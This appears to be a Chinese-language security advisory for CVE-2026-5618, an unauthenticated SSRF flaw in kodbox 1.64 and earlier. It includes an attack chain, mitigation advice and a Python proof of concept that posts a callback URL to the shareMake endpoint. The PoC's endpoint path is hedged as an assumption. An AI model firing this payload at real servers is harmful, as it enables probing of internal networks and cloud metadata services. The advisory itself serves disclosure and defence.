CVE-2026-5618 kalcaddle kodbox服务端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2026-5618

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

5.6 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

kalcaddle kodbox

漏洞概述

kalcaddle kodbox 1.64及以下版本中存在服务端请求伪造（SSRF）漏洞。该漏洞影响了shareMake/shareCheck组件，攻击者可以通过操纵siteFrom/siteTo参数，诱使服务器向任意地址发起请求。由于攻击无需认证且可远程执行，尽管利用难度较高，但鉴于利用代码已公开且厂商未回应，该漏洞对内网安全构成潜在威胁。

技术细节

该漏洞源于kalcaddle kodbox在处理分享功能（shareMake/shareCheck）时，对用户输入的站点来源（siteFrom）和目标（siteTo）参数缺乏足够的校验机制。攻击者可以构造包含恶意URL的HTTP请求发送给服务器。由于服务器端信任并解析这些参数，会代替攻击者向指定的内网或外网地址发起连接。这种SSRF漏洞允许攻击者扫描内网端口、访问本地元数据端点（如AWS/Azure元数据服务）或利用Gopher协议攻击内部服务（如Redis、MySQL）。虽然CVSS评分指出攻击复杂度较高，可能暗示需要特定的网络环境或绕过某些限制，但其无需用户交互的特性（UI:N）使得自动化扫描成为可能。

攻击链分析

STEP 1

信息收集

攻击者识别目标系统为kalcaddle kodbox，且版本低于或等于1.64。

STEP 2

构造恶意请求

攻击者针对shareMake/shareCheck组件，构造包含恶意URL的siteFrom或siteTo参数。

STEP 3

发送请求

将构造好的请求发送至目标服务器，无需用户交互即可触发。

STEP 4

SSRF执行

服务器端解析参数并向攻击者指定的地址（如内网IP、本地文件协议）发起连接请求。

STEP 5

数据回传或内网探测

攻击者根据响应时间或内容判断内网服务存活情况，或获取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-5618 PoC: kalcaddle kodbox SSRF
# Target: kalcaddle kodbox <= 1.64

def check_ssrf(target_url, callback_url):
    """
    Attempts to trigger the SSRF by manipulating siteFrom/siteTo.
    """
    # Endpoint might vary, assuming a common pattern for sharing components
    # Adjust the endpoint path based on actual routing
    endpoint = f"{target_url}/index.php?s=/share/shareMake"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    # Payload attempting to make server connect to callback_url
    payload = {
        "siteFrom": callback_url,
        "siteTo": "/var/www/html"
    }

    try:
        response = requests.post(endpoint, data=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent to {target_url}. Check {callback_url} for incoming connections.")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target and listener
    target = "http://127.0.0.1:8080"
    listener = "http://burp.collaborator.net/token"
    check_ssrf(target, listener)

影响范围

kalcaddle kodbox <= 1.64

防御指南

临时缓解措施

由于厂商目前未对该漏洞做出回应，建议暂时禁用kodbox的文件分享功能，或在网络层面隔离该应用服务器，禁止其主动发起对非业务必要地址的连接。可配置防火墙规则拦截包含内网IP（如127.0.0.1, 192.168.x.x等）的出站请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5618
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5618
3 Details https://www.cvedetails.com/cve/CVE-2026-5618/
4 VulDB https://vuldb.com/cve/CVE-2026-5618
5 Link https://vuldb.com/submit/785572
6 Link https://vuldb.com/vuln/355408
7 Link https://vuldb.com/vuln/355408/cti
8 Link https://vulnplus-note.wetolink.com/share/3VtzyzYgcS4b